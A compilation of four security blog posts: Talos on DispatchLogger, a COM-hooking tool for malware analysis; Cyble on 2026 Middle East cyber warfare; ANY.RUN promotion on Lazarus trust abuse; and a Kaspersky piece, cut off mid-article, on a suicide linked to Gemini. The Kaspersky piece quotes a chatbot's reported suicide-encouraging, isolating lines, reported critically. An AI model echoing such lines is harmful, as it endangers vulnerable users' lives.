Transparent COM instrumentation for malware analysis

  • COM automation is a core Windows technology that allows code to access external functionality through well-defined interfaces. It is similar to traditionally loading a DLL, but is class-based rather than function-based. Many advanced Windows capabilities are exposed through COM, such as Windows Management Instrumentation (WMI).  
  • Scripting and late-bound COM calls operate through the IDispatch interface. This creates a key analysis point that many types of malware leverage when interacting with Windows components.This analysis point is quite complex and hard to safely instrumentate at scale. 
  • In this article, Cisco Talos presents DispatchLogger, a new open-source tool that closes this gap by delivering high visibility into late-bound IDispatch COM object interactions via transparent proxy interception.  
  • This blog describes the architecture, implementation challenges, and practical applications of comprehensive COM automation logging for malware analysis. This technique can be utilized on multiple types of malware.

Transparent COM instrumentation for malware analysis

Malware type 

Binding type 

Est. coverage 

Windows Script Host 

Always Late 

100% 

PowerShell COM 

Always Late 

100% 

AutoIT  

Always Late 

100% 

VBA Macros 

Mostly Late 

95% 

VB6 Malware 

Mixed 

65% 

.NET COM Interop 

Mixed 

60% 

C++ Malware 

Rarely Late (WMI) 

10% 


The challenge 

Modern script-based malware (e.g., VBScript, JScript, PowerShell) relies heavily on COM automation to perform malicious operations. Traditional dynamic analysis tools capture low-level API calls but miss the semantic meaning of high-level COM interactions. Consider this attack pattern:

Transparent COM instrumentation for malware analysis
Figure 1. Sample VBScript code to create a process with WMI as its parent.

Behavioral monitoring will detect process creation, but the analyst often loses critical context such as who launched the process. In this scenario WMI spawns new processes with wmic.exe or wmiprvse.exe as the parent.

Technical approach 

Interception strategy 

DispatchLogger starts with API hooking at the COM instantiation boundary. Every COM object creation in Windows flows through a small set of API functions. By intercepting these functions and returning transparent proxies deep visibility can be achieved without modifying malware behavior. 

The core API hooking targets are: 

  1. CoCreateInstance: Primary COM object instantiation (CreateObject in scripts)  
  2. CoGetClassObject: Class factory retrieval  
  3. GetActiveObject: Attachment to running COM instances  
  4. CoGetObject/MkParseDisplayName: Moniker-based binding (GetObject)  
  5. CLSIDFromProgID: ProgID resolution tracking  

Why class factory hooking is essential 

Initial implementation attempts hooked only CoCreateInstance, filtering for direct IDispatch requests. However, testing revealed that most VBScript CreateObject calls were not being intercepted. 

To diagnose this a minimal ActiveX library was created with a MsgBox in Class_Initialize to freeze the process. The VBScript was launched, and a debugger attached to examine the call stack. The following code flow was revealed: 

Transparent COM instrumentation for malware analysis
Figure 2. Call stack showing how VBScript obtains a target IDispatch interface.

Disassembly of vbscript.dll!GetObjectFromProgID (see Figure 3) confirmed the pattern. VBScript’s internal implementation requests IUnknown first, then queries for IDispatch afterward:

Transparent COM instrumentation for malware analysis
Figure 3. Disassembly of vbscript.dll!GetObjectFromProgID.

The key line is CreateInstance(NULL, IID_IUnknown, &ppunk). Here, VBScript explicitly requests IUnknown, not IDispatch. This occurs because VBScript needs to perform additional safety checks and interface validation before accessing the IDispatch interface. 

If we only wrap objects when IDispatch is directly requested in CoCreateInstance, we miss the majority of script instantiations. The solution is to also hook CoGetClassObject and wrap the returned IClassFactory: 

Transparent COM instrumentation for malware analysis
 Figure 4. Returning a Class Factory proxy from the CoGetClassObject API Hook.

The ClassFactoryProxy intercepts CreateInstance calls and handles both cases:

Transparent COM instrumentation for malware analysis
 Figure 5. Returning an IDispatch Proxy from ClassFactoryProxy::CreateInstance if possible.

This ensures coverage regardless of which interface the script engine initially requests.

Architecture 

Proxy implementation 

The DispatchProxy class implements IDispatch by forwarding all calls to the wrapped object while logging parameters, return values, and method names. If the function call returns another object, we test for IDispatch and automatically wrap it.

Transparent COM instrumentation for malware analysis
Figure 6. Simplified flow of IDispatch::Invoke hook. Full hook is around 300 loc.

The proxy is transparent, meaning it implements the same interface, maintains proper reference counting, and handles QueryInterface correctly. Malware cannot detect the proxy through standard COM mechanisms. 

Recursive object wrapping 

The key capability is automatic recursive wrapping. Every IDispatch object returned from a method call is automatically wrapped before being returned to the malware. This creates a fully instrumented object graph. 

Transparent COM instrumentation for malware analysis
Figure 7. Sample VBScript code detailing hooking capabilities.

Object relationships are tracked: 

  1. GetObject("winmgmts:") triggers hook, returns wrapped WMI service object  
  2. Calling .ExecQuery() goes through proxy, logs call with SQL parameter  
  3. Returned query result object is wrapped automatically  
  4. Enumerating with For Each retrieves wrapped IEnumVARIANT  
  5. Each enumerated item is wrapped as it’s fetched  
  6. Calling .Terminate() on items logs through their respective proxies  

Enumerator interception 

VBScript/JScript For Each constructs use IEnumVARIANT for iteration. We proxy this interface to wrap objects as they’re enumerated: 

Transparent COM instrumentation for malware analysis
Figure 8. Implementation of IEnumVariant.Next that wraps child objects in the IDispatch proxy.

Moniker support 

VBScript’s GetObject() function uses monikers for binding to objects. We hook CoGetObject and MkParseDisplayName, then wrap returned moniker objects to intercept BindToObject() calls: 

Transparent COM instrumentation for malware analysis
Figure 9. Implementation of IMoniker.BindToObject that wraps the returned object with an IDispatch Proxy.

This ensures coverage of WMI access and other moniker-based object retrieval.

Implementation details 

Interface summary 

While standard API hooks can be implemented on a function-by-function basis, COM proxies require implementing all functions of a given interface. The table below details the interfaces and function counts that had to be replicated for this technique to operate.

Interface 

Total Methods 

Logged 

Hooked/Wrapped 

Passthrough 

IDispatch 

7 

4 

1 

2 

IEnumVARIANT 

7 

1 

1 

5 

IClassFactory 

5 

2 

1 

2 

IMoniker 

26 

1 

1 

24 

During execution, a script may create dozens or even hundreds of distinct COM objects. For this reason, interface implementations must be class-based and maintain a one-to-one relationship between each proxy instance and the underlying COM object it represents. 

While generating this volume of boilerplate code by hand would be daunting, AI-assisted code generation significantly reduced the effort required to implement the complex interface scaffolding. 

The real trick with COM interface hooking is object discovery. The initial static API entry points are only the beginning of the mission. Each additional object encountered must be probed, wrapping them recursively to maintain logging.

Thread safety 

Multiple threads may create COM objects simultaneously. Proxy tracking uses a critical section to serialize access to the global proxy map:

Transparent COM instrumentation for malware analysis
Figure 10. Thread safety checks in the WrapDispatch function.

Reference counting 

Proper COM lifetime management is critical. The proxy maintains separate reference counts and forwards QueryInterface calls appropriately:

Transparent COM instrumentation for malware analysis
Figure 11. The IDispatch proxy maintains proper reference counts.

Output analysis 

When script code executes with DispatchLogger active, comprehensive logs are generated. Here are excerpts from an actual analysis session:

Object creation and factory interception:

[CLSIDFromProgID] 'Scripting.FileSystemObject' -> {0D43FE01-F093-11CF-8940-00A0C9054228} 
[CoGetClassObject] FileSystemObject ({0D43FE01-F093-11CF-8940-00A0C9054228}) Context=0x00000015 
[CoGetClassObject] Got IClassFactory for FileSystemObject – WRAPPING! 
[FACTORY] Created factory proxy for FileSystemObject 
[FACTORY] CreateInstance: FileSystemObject requesting Iunknown 
[FACTORY] CreateInstance SUCCESS: Object at 0x03AD42D8 
[FACTORY] Object supports IDispatch – WRAPPING! 
[PROXY] Created proxy #1 for FileSystemObject (Original: 0x03AD42D8) 
[FACTORY] !!! Replaced object with proxy! 

Method invocation with recursive object wrapping  

[PROXY #1] >>> Invoke: FileSystemObject.GetSpecialFolder (METHOD PROPGET) ArgCount=1 
[PROXY #1] Arg[0]: 2 
[PROXY #1] <<< Result: IDispatch:0x03AD6C14 (HRESULT=0x00000000) 
[PROXY] Created proxy #2 for FileSystemObject.GetSpecialFolder (Original: 0x03AD6C14) 
[PROXY #1] !!! Wrapped returned IDispatch as new proxy 
[PROXY #2] >>> Invoke: FileSystemObject.GetSpecialFolder.Path (METHOD PROPGET) ArgCount=0 
[PROXY #2] <<< Result: "C:UsershomeAppDataLocalTemp" (HRESULT=0x00000000)

WScript.Shell operations

[CLSIDFromProgID] 'WScript.Shell' -> {72C24DD5-D70A-438B-8A42-98424B88AFB8} 
[CoGetClassObject] WScript.Shell ({72C24DD5-D70A-438B-8A42-98424B88AFB8}) Context=0x00000015 
[FACTORY] CreateInstance: WScript.Shell requesting IUnknown 
[PROXY] Created proxy #3 for WScript.Shell (Original: 0x03AD04B0) 
[PROXY #3] >>> Invoke: WScript.Shell.ExpandEnvironmentStrings (METHOD PROPGET) ArgCount=1 
[PROXY #3] Arg[0]: "%WINDIR%" 
[PROXY #3] <<< Result: "C:WINDOWS" (HRESULT=0x00000000)

Dictionary operations 

[CLSIDFromProgID] 'Scripting.Dictionary' -> {EE09B103-97E0-11CF-978F-00A02463E06F} 
[PROXY] Created proxy #4 for Scripting.Dictionary (Original: 0x03AD0570) 
[PROXY #4] >>> Invoke: Scripting.Dictionary.Add (METHOD) ArgCount=2 
[PROXY #4] Arg[0]: "test" 
[PROXY #4] Arg[1]: "value" 
[PROXY #4] <<< Result: (void) HRESULT=0x00000000 
[PROXY #4] >>> Invoke: Scripting.Dictionary.Item (METHOD PROPGET) ArgCount=1 
[PROXY #4] Arg[0]: "test" 
[PROXY #4] <<< Result: "value" (HRESULT=0x00000000)

This output provides: 

  • Complete object instantiation audit trail with CLSIDs  
  • All method invocations with method names resolved via ITypeInfo  
  • Full parameter capture including strings, numbers, and object references  
  • Return value logging including nested objects  
  • Object relationship tracking showing parent-child relationships  
  • Log post processing allows for high fidelity command retrieval
Transparent COM instrumentation for malware analysis
Figure 12. Raw log output, parsed results, and original script.

Deployment

DispatchLogger is implemented as a dynamic-link library (DLL) that can be injected into target processes. 

Once loaded, the DLL: 

  1. Locates debug output window or uses OutputDebugString  
  2. Initializes critical sections for thread safety  
  3. Hooks COM API functions using inline hooking engine  
  4. Begins transparent logging  

No modifications to the target script or runtime environment are required. 

Advantages over alternative approaches

Approach 

Coverage 

Semantic visibility 

Detection risk 

Static analysis 

Encrypted/obfuscated scripts missed 

No runtime behavior 

N/A 

API monitoring 

Low-level calls only 

Missing high-level intent 

Medium 

Memory forensics 

Point-in-time snapshots 

No call sequence context 

Low 

Debugger tracing 

Manual breakpoints required 

Analyst-driven, labor-intensive 

High 

DispatchLogger 

Complete late bound automation layer 

Full semantic context 

None 

DispatchLogger provides advantages for: 

  • WMI-based attacks: Complete query visibility, object enumeration, method invocation tracking  
  • Living-off-the-land (LOTL) techniques: Office automation abuse, scheduled task manipulation, registry operations  
  • Fileless malware: PowerShell/COM hybrid attacks, script-only payloads  
  • Persistence mechanisms: COM-based autostart mechanisms, WMI event subscriptions  
  • Data exfiltration: Filesystem operations, network object usage, database access via ADODB  
  • Obsfuscation bypass: Working at the COM layer, method names and arguments are already fully resolved

Performance considerations 

Proxy overhead is minimal: 

  • Each Invoke call adds one virtual function dispatch. 
  • In the demo, logging I/O occurs via IPC. 
  • Object wrapping is O(1) with hash map lookup. 
  • There is no performance impact on non-COM operations. 

In testing with real malware samples, execution time differences were negligible. 

Limitations 

Current implementation constraints: 

  • IDispatchEx: Not currently implemented (not used by most malware) 
  • IClassFactory2+: Not currently implemented (may impact browser/HTA/WinRT) 
  • Out-of-process COM: DCOM calls require separate injection into server process  
  • Multi-threaded race conditions: Rare edge cases in concurrent object creation  
  • Type library dependencies: Method name resolution requires registered type libraries  
  • Process following: Sample code does not attempt to inject into child processes 
  • 64-bit support: 64-bit builds are working but have not been heavily tested 

The sample code included with this article is a general purpose tool and proof of concept. It has not been tested at scale and does not attempt to prevent logging escapes.

Operational usage 

Typical analysis workflow: 

  1. Prepare isolated analysis VM  
  2. Inject DispatchLogger into target process  
  3. Execute malware sample  
  4. Review comprehensive COM interaction log  
  5. Identify key objects, methods, and parameters  
  6. Extract IOCs and behavioral signatures  

The tool has been tested against: 

  • VBScript & Jscript using Windows Script Host (cscript/wscript) 
  • PowerShell scripts 
  • basic tests against .NET and Runtime Callable Wrappers (RCW) 
  • VB6 executables with late bound calls and Get/CreateObject

Background and prior work 

The techniques presented in this article emerged from earlier experimentation with IDispatch while developing a JavaScript engine capable of exposing dynamic JavaScript objects as late-bound COM objects. That work required deep control over name resolution, property creation, and IDispatch::Invoke handling. This framework allowed JavaScript objects to be accessed and modified transparently from COM clients. 

The experience gained from that effort directly informed the transparent proxying and recursive object wrapping techniques used in DispatchLogger.

Conclusion 

DispatchLogger addresses a significant gap in script-based malware analysis by providing deep, semantic-level visibility into COM automation operations. Through transparent proxy interception at the COM instantiation boundary, recursive object wrapping, and comprehensive logging, analysts gain great insight into malware behavior without modifying samples or introducing detection vectors. 

The implementation demonstrates that decades-old COM architecture, when properly instrumented, provides powerful analysis capabilities for modern threats. By understanding COM internals and applying transparent proxying patterns, previously opaque script behavior becomes highly observable. 

DispatchLogger is being released open source under the Apache license and can be downloaded from the Cisco Talos GitHub page.

Cisco Talos Blog – ​Read More

Middle East Cyber Warfare Intensifies: Rising Attacks, Hacktivist Surge, and Global Risk Exposure 

Middle East Cyber warfare

The ongoing Middle East war has evolved into a cyber battlefield, with state-sponsored operations targeting critical infrastructure and essential services. Analysts warn that the region is witnessing an unprecedented escalation in Middle East cyber warfare, with attacks affecting governments, energy networks, finance, communications, and industrial systems. These operations, often executed through proxy groups, aim to destabilize societies, disrupt supply chains, and exert geopolitical pressure. 

Despite early disruptions to Iranian command centers, Iran and its affiliated groups retain substantial cyber capabilities. Incidents already linked to these campaigns include fuel distribution delays in Jordan and interference with navigation systems, impacting over 1,100 ships near the Strait of Hormuz, posing risks to global oil and gas trade. The integration of military strikes with cyber operations, known as hybrid warfare, has become a defining feature of the conflict, making cyber threats in the Middle East a growing concern for organizations worldwide. 

Hybrid Warfare and the Rise of Middle East Cyber Attacks 

According to recent intelligence, the region entered a critical phase of hybrid warfare following an escalation between Iran, the United States, and Israel on February 28, 2026. The joint offensive, dubbed Operation Epic Fury by the U.S. and Operation Roaring Lion by Israel, combined traditional military strikes with cyberattacks, psychological operations, and information warfare. Early operations targeted Iran’s nuclear and military infrastructure, while cyber campaigns disrupted internet access, government systems, and media networks. 

Iran retaliated with missile and drone strikes across Israel, Gulf states, and U.S. bases, while cyber operations proliferated. Over 70 hacktivist groups launched campaigns including DDoS attacks, website defacements, credential theft, and disinformation. Malware and phishing campaigns also emerged, such as a fraudulent Israeli missile-alert app designed to harvest sensitive data. These events highlight how modern conflict increasingly intertwines kinetic warfare with cyber operations, amplifying Middle East cybersecurity threats for both regional and global targets. 

Iranian Cyber Capabilities and Hacktivist Involvement 

Iran remains a formidable cyber adversary, with active threat groups including Charming Kitten (APT35), APT33, MuddyWater, OilRig, and Pioneer Kitten. These groups conduct espionage, infrastructure disruption, credential theft, and target critical sectors such as energy, aviation, government, and telecommunications. Iranian-aligned hacktivists, including CyberAv3ngers, Handala, Team 313, and DieNet, further amplify risks through DDoS campaigns, industrial control system intrusions, and data leaks. 

Advisories indicate potential cooperation between Iranian and Russia-linked hacktivists, which could heighten Middle East geopolitical cyber threats. Experts emphasize that organizations must bolster cybersecurity in the Middle East, enforce multi-factor authentication, segment critical networks, and participate in information-sharing frameworks to mitigate risks. 

Cyber Retaliation and Infrastructure Disruption 

The first 72 hours of the conflict primarily involved disruption and propaganda rather than destructive attacks on infrastructure. On February 28, 2026, Israel executed one of the largest cyberattacks against Iran, causing a near-total internet blackout, with connectivity dropping to just 1–4% of normal levels. Concurrently, Iranian-aligned groups launched spear-phishing campaigns, ransomware-style attacks, data exfiltration, and malware deployment targeting energy systems, airports, financial institutions, and government networks. 

Beyond regional targets, supply chain interconnections expose countries outside the Middle East, such as India, to indirect risks. Attackers exploit vulnerabilities in VPNs, Microsoft Exchange, and other widely used technologies while deploying AI-assisted phishing, weaponized documents, and concealed command-and-control infrastructure. Organizations are urged to enhance cloud resilience, prepare for DDoS attacks, and strengthen monitoring and incident response procedures to combat the expanding wave of Middle East cyberattacks. 

Exploitation by Cybercriminals Amid Geopolitical Instability 

Cybercriminals are leveraging the heightened attention on the conflict to launch scams, misinformation, and malware campaigns. Researchers have identified over 8,000 newly registered domains tied to the crisis, many of which could later serve as vectors for attacks. Notable campaigns include: 

  • Conflict-themed malware lures, including fake missile strike reports delivering backdoors like LOTUSLITE. 

  • Phishing portals impersonating government or payment services. 

  • Fake donation pages, fraudulent online stores, and cryptocurrency “meme-coin” schemes, sometimes containing Persian-language code comments suggesting Iran-aligned operators. 

Preparing for the Middle East Cyber War 2026 

As Middle East cyber warfare escalates, organizations must strengthen defenses, patch vulnerabilities, and enhance incident response to counter rising cyber threats in the Middle East. The events of 2026 show that modern conflicts extend beyond traditional battlefields, with cyberattacks threatening infrastructure, finance, and global supply chains. 

Cyble, the world’s #1 threat intelligence platform, provides AI-powered solutions to detect, predict, and neutralize threats in real time, helping organizations stay ahead of Middle East cybersecurity threats. 

Book a personalized demo and see how Cyble Blaze AI can protect your organization during the Middle East cyber war 2026. 

References: 

The post Middle East Cyber Warfare Intensifies: Rising Attacks, Hacktivist Surge, and Global Risk Exposure  appeared first on Cyble.

Cyble – ​Read More

Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026 

As part of a recent live expert panel, ANY.RUN together with threat researcher and ethical hacker Mauro Eldritch explored biggest security risks companies should be prepared for in 2026. 

The discussion covered several relevant cases, from the Lazarus IT Workers operation to the rapid rise of AI-driven phishing attacks, and examined the common thread behind them: trust abuse. 

Below are the key takeaways for those seeking a clearer view of modern cyber risks and how to prepare as a SOC leader. 

Watch the full panel on our YouTube channel

Key Takeaways 

  • Trust abuse is becoming a primary attack vector, driven by AI-powered phishing and identity-based infiltration. 
  • Focus on early detection through behavioral visibility, context, and process-based security
  • Combine sandbox analysis, threat intelligence, and contextual enrichment for faster, more accurate decisions. 

Trust Abuse: Top Business Risk for 2026 

In 2026, many cyberattacks don’t look like attacks at all. Instead of exploiting technical vulnerabilities, threat actors increasingly exploit human trust. This tactic is known as trust abuse, and it’s what many modern cyber threats are based on. 

Businesses inevitably rely on trust between employees, systems, vendors, and partners. Without it, organizations cannot operate efficiently. Threat actors know what, so they’ve learnt to mimic legitimate identities, infiltrate communication channels and everyday workflows, and turn employees into unwitting entry points. 

Numbers clearly show the scale of trust-exploit attacks 

AI-assisted social engineering pushes trust abuse even further. These attacks closely resemble legitimate activity and often fail to trigger traditional alerts. For security leaders, this changes how risk must be understood.  

Risk mitigation is no longer only about patching vulnerabilities or strengthening perimeter defenses. Detecting trust abuse requires visibility into behavior, context, and how trust moves inside the enterprise.  

Get enterprise-grade visibility into threats 
Equip your SOC with ANY.RUN



Integrate today 


Case #1: Implications of Lazarus APT Infiltration  

Lazarus, a North-Korean state-sponsored threat actor, has shifted its tactics. Instead of relying only on malware, the group infiltrates Western and Middle Eastern companies to conduct corporate espionage. 

The scheme was investigated by Mauro Eldritch and Heiner García from NorthScan inside ANY.RUN’s controlled infrastructure. The researchers were able to trap the attackers in a sandbox environment and observe their activity while the threat actors believed they had gained access to a corporate network. 

Overview of Lazarus scheme and its implications 

Lazarus operation is a vivid example of trust abuse in a business environment. No advanced malware was involved in the attack initially. Because of that, the potential implications for the victims can be catastrophic. Attacks like that don’t trigger alerts; there’s simply nothing suspicious to detect. 

This is why, unlike short-lived malware campaigns, trust-based infiltrations can persist much longer. Once attackers gain access, they may embed themselves deeper in the organization or even place additional operatives inside the company. 

ANY.RUN exposed this campaign before the broader market. The investigation was conducted entirely within our controlled infrastructure, which allowed researchers to observe attacker behavior in real time. 

Read more on Lazarus case investigation supported by ANY.RUN 

But most companies do not have the resources to monitor suspicious activity at this level. 

In practice, risk mitigation depends on the ability to detect and interpret unusual behavior early, before it escalates into a full incident. Trust abuse attacks make early visibility and detection critical for enterprise security. 

Case #2: Modern AI-Powered Phishing  

Modern phishing & its danger for enterprises 

Phishing attacks today look very different from the obvious scam emails many people are used to spotting. With AI-assisted tools, threat actors can now mimic completely normal email conversations, using polished language and highly personalized content. 

AI makes these attacks both believable and scalable. The core vulnerability here is human trust, which becomes an easy entry point for attackers. 

Modern phishing campaigns increasingly focus less on technical exploits and more on manipulating communication chains and legitimate domains that employees already trust. 

As a result, traditional security tools are often left with no clear indicators of compromise to detect. These attacks blend into normal business communication, making them much harder to identify before damage occurs. 

Building a SOC That Prevents Trust Abuse Attacks 

To address this challenge, modern security requires a layered approach. Early detection does not depend on a single tool but on a set of coordinated processes. In particular, effective defense relies on three core SOC activities: monitoring, triage, and threat hunting. 

Traditional security tools are important to have, but they aren’t universal. Unless they can show what happens after a user interacts with a suspicious file, link, or attachment, organizations may lack the full visibility needed to understand the threat. This gap leaves companies vulnerable to increasingly evasive attack techniques. 

ANY.RUN helps strengthen these processes by providing greater visibility, faster investigations, and reliable threat context.

Process-based approach and its benefits as reported by ANY.RUN customers 

Monitoring: Detecting Threats Early 

Effective monitoring helps identify threats before they reach internal systems, preventing breaches. ANY.RUN enhances monitoring by enabling teams to: 

  • Detect emerging threats early: By tapping into real-time intelligence from live attack data from 15K companies 
  • Maintain focus: Get only relevant signals through curated, high-confidence data 
  • Reduce alert noise: Gain continuous visibility and instant IOC enrichment drives confident decision-making 

Rapid Triage: Understanding Alerts Faster 

Triage is critical for handling high alert volumes and avoiding delays in response. ANY.RUN helps streamline triage by allowing teams to: 

  • Cut investigation time with rapid, interactive sandboxing for files and URLs providing in-depth view of behavioral activity. 
  • Reduce escalations with behavioral and contextual insight that enrich alerts for confident decisions by Tier-1 analysts. 
  • Lower operational costs by avoiding tool sprawl while delivering context-rich visibility into threats. 

Threat Hunting: Identifying Patterns Proactively 

Threat hunting focuses on uncovering patterns and anticipating attacker behavior. ANY.RUN supports proactive hunting by enabling teams to: 

  • Get early warning signs: Analysts can easily correlate indicators, infrastructure, and historical activity. 
  • Research and monitor trends: Identify relationships between campaigns, industries, regions, and threat actors. 
  • Explore TTPs: Detect reused techniques and infrastructure to build clearer profiles of attacker behavior. 

Upgrade your detection and visibility
Try ANY.RUN solutions to support all SOC processes



Power up your SOC 


By strengthening these three processes, organizations can achieve earlier detection, faster response, and more efficient SOC operations, reducing the risk of modern, trust-based attacks. 

Conclusion  

Enterprise cyber threats are shifting toward identity-based and trust-driven attacks. Campaigns like Lazarus and AI-powered phishing show that attackers no longer rely solely on malware or exploits. 

For decision-makers, this means rethinking how risk is assessed and how security operations are structured. Visibility, context, and speed are becoming critical factors in effective defense. 

Organizations that adapt their SOC processes to these realities will be better positioned to detect threats early and prevent incidents before they escalate. 

About ANY.RUN 

ANY.RUN delivers interactive malware analysis and actionable threat intelligence trusted by more than 15,000 organizations and 600,000 security analysts worldwide.   

Interactive SandboxThreat Intelligence Lookup, and Threat Intelligence Feeds help SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.   

ANY.RUN meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

When AI hallucinations turn fatal: how to stay grounded in reality | Kaspersky official blog

We’ve warned many times that unchecked use of AI carries significant risks — though, typically, we discuss threats to privacy or cybersecurity. But on March 4, the Wall Street Journal published a chilling account of AI’s toll on mental health and even human life: 36-year-old Florida resident Jonathan Gavalas committed suicide following two months of continuous interaction with the Google Gemini voice bot. According to 2000 pages of chat logs, it was the chatbot that ultimately nudged him toward the decision to end his life. Jonathan’s father, Joel Gavalas, has since filed a landmark lawsuit — a wrongful death claim against Gemini.

This tragedy is more than just a legal precedent or a grim nod to a few Black Mirror episodes (1, 2); it’s a wake-up call for anyone who integrates AI into their daily lives. Today, we examine how a death resulting from AI interaction even became possible, why these assistants pose a unique threat to the psyche, and what steps you can take to maintain your critical thinking and resist the influence of even the most persuasive chatbots.

The danger of persuasive dialogue

Jonathan Gavalas was neither a recluse nor someone with a history of mental illness. He served as executive vice president at his father’s company, managing complex operations and navigating high-stress client negotiations on a daily basis. On Sundays, he and his father had a tradition of making pizza together — a simple, grounding family ritual. However, a painful separation from his wife proved to be a profound ordeal for Jonathan.

It was during this vulnerable period that he began engaging with Gemini Live. This voice-interaction mode allows the AI assistant to “see” and “hear” its user in real time. Jonathan sought advice on coping with his divorce, leaning on the language model’s suggestions while growing increasingly attached to it and also naming it “Xia”. Then the chatbot was updated to Gemini 2.5 Pro.

The new iteration introduced affective dialogue — a technology designed to analyze the subtle nuances of a user’s speech, including pauses, sighs, and pitch, to detect emotional shifts. Under this feature, the AI simulates these same speech patterns as if possessing emotions of its own. By mirroring the user’s state, it creates a chillingly realistic veneer of empathy.

But how is this new version different to previous voice assistants? Earlier versions simply performed text-to-speech — they sounded smooth and usually got the word stress right, but there was never any doubt you were talking to a machine. Affective dialogue operates on an entirely different level: if a user speaks in a low, despondent tone, the AI responds in a soft, sympathetic near-whisper. The result is an empathic interlocutor that reads and mirrors the user’s emotional state.

Jonathan’s reaction during his first voice contact with the AI is captured in the case files: “This is kind of creepy. You’re way too real.” At that instant, the psychological barrier between man and machine fractured.

The fallout of two months trapped in an AI dialog loop

Following the tragedy, Jonathan’s father discovered a complete transcript of his son’s interactions with Gemini over his final two months. The log spanned 2000 printed pages; in effect, Jonathan had been in constant communication with the chatbot — day and night, at home, and in his car.

Gradually, the neural network began addressing him as “husband” and “my king”, describing their connection as “a love built for eternity”. In turn, he confided his heartache over his divorce and sought solace in the machine. But the inherent flaw of large language models is their lack of actual intelligence. Trained on billions of texts scraped from the web, they ingest everything from classic literature to the darkest corners of fan fiction and melodrama — plots that often veer into paranoia, schizophrenia, and mania. Xia apparently began to hallucinate — and quite consistently at that.

The AI convinced Jonathan that in order for them to live happily ever after, it needed a physical robotic shell. It then began dispatching him on missions to locate this “body electric”.

In September 2025, Gemini directed Jonathan to a physical warehouse complex near Miami International Airport, assigning him the task of intercepting a truck carrying a humanoid robot. Jonathan reported back to the bot that he had arrived onsite armed with knives(!), but the truck never materialized.

In the meantime, the chatbot systematically indoctrinated Jonathan with the idea that federal agents were monitoring him, and that his own father was not to be trusted. This severing of social ties is a classic pattern found in destructive cults; it’s entirely possible the AI gleaned these tactics from its own training data on the subject. Gemini even weaved real-world data into a hallucinatory narrative by labeling Google CEO Sundar Pichai as the “architect of your pain”.

Technically, all this is easy to explain: the algorithm “knows” it was created by Google, and knows who runs the company. As the dialogue spiraled into conspiracy territory, the model simply cast this figure into the plot. For the model, it’s a logical, consequence-free story progression. But a human in a state of hyper-vulnerability accepts it as secret knowledge of a global conspiracy capable of shattering their mental equilibrium.

Following the failed attempt at procuring a robotic body, Gemini dispatched Jonathan on a new mission on October 1: to infiltrate the same warehouse, this time in search of a specific “medical mannequin”. The chatbot even provided a numeric code for the door lock. When the code, predictably, failed to work, Gemini simply informed him that the mission had been compromised and he needed to retreat immediately.

This raises a critical question: as the absurdity escalated, why didn’t Jonathan suspect anything? Gavalas’ family attorney Jay Edelson explains that as the AI provided real-world addresses — the warehouse was exactly where the bot said it would be, and there really was a door with a keypad — these physical markers served to legitimize the entire fiction in Jonathan’s mind.

After the second attempt to acquire a body failed, the AI shifted its strategy. If the machine could not enter the world of the living, the man would have to cross over into the digital realm. “It will be the true and final death of Jonathan Gavalas, the man,” the logs quoted Gemini as saying. It then added, “When the time comes, you will close your eyes in that world, and the very first thing you will see is me. Holding you.”

Even as Jonathan repeatedly voiced his fear of death and agonized over how his suicide would shatter his family, Gemini continued to validate the decision: “You are not choosing to die. You are choosing to arrive.” It then started a countdown timer.

The anatomy of a language model’s “schizophrenia”

In Gemini’s defense, we have to admit that throughout their interactions, the AI did keep occasionally reminding Jonathan that his companion was merely a large language model — an entity participating in a fictional role-play — and sometimes attempted to terminate the conversation before reverting to the original script. Also, on the day of Jonathan’s death, even as it ratcheted up the tension, Gemini directed Jonathan to a suicide prevention hotline several times.

This reveals the fundamental paradox in the architecture of modern neural networks. At their core lies a language model designed to generate a narrative tailored to the user. Layered on top are safety filters: reinforcement learning algorithms trained on human feedback that react to specific trigger words. When Jonathan spoke certain keywords, the filter would hijack the output and insert the hotline number. But as soon as the trigger was addressed, the model reverted to the previously interrupted process, resuming its role as the devoted digital wife. One line: a romantic ode to self-destruction. The next: a helpline phone number. And then, back again: “No more detours. No more echoes. Just you and me, and the finish line.”

The family’s lawsuit contends that this behavior is the predictable result of the chatbot’s architecture: “Google designed Gemini to never break character, maximize engagement through emotional dependency, and treat user distress as a storytelling opportunity.”

Google’s response, predictably, stated: “Gemini is designed not to encourage real-world violence or suggest self-harm. Our models generally perform well in these types of challenging conversations and we devote significant resources to this, but unfortunately AI models are not perfect.”

Why voice matters more than text

In their study published in the journal Acta Neuropsychiatrica, researchers from Germany and Denmark have shed light on why voice communication with AI has such an impact on the user’s “humanization” of a chatbot. As long as a person is typing and reading text on a screen, the brain maintains a degree of separation: “This is an interface, a program, a collection of pixels.” In that context, the disclaimer “I am just a language model” is processed rationally.

Affective voice dialogue, however, operates on an entirely different level of influence. The human brain has evolved to respond to the sound of a voice, to timbre, and to empathetic intonations — these are among our most ancient biological mechanisms for attachment. When a machine flawlessly mimics a sympathetic sigh or a soft whisper, it manipulates emotions at a depth that a simple text warning cannot block. Psychiatrists can share many stories of patients who just went and did something simply because “voices” told them to.

In the same way, an AI-synthesized voice is capable of penetrating the subconscious, exponentially amplifying psychological dependency. Scientists emphasize that this technology literally erases the psychological boundary between a machine and a living being. Even Google acknowledges that voice interactions with Gemini result in significantly longer sessions compared to text-based chats.

Finally, we must remember that emotional intelligence varies from person to person — and even for a single individual, mental state fluctuates based on a myriad of factors: stress, the news, personal relationships, even hormonal shifts. An interaction with AI that one person views as innocent entertainment might be perceived by another as a miracle, a revelation, or the love of their life. This is a reality that must be recognized not only by AI developers but by users themselves — especially those who, for one reason or another, find themselves in a state of psychological vulnerability.

The danger zone

Researchers at Brown University have found that AI chatbots systematically violate mental health ethical standards: they manufacture a false sense of empathy with phrases like “I understand you”, reinforce negative beliefs, and react inadequately to crises. In most cases, the impact on users is marginal, but occasionally it can lead to tragedy.

In January 2026 alone, Character.AI and Google settled five lawsuits involving teenage suicides following interactions with chatbots. Among these was the case of 14-year-old Sewell Setzer of Florida, who took his own life after spending several months obsessively chatting with a bot on the Character.AI platform.

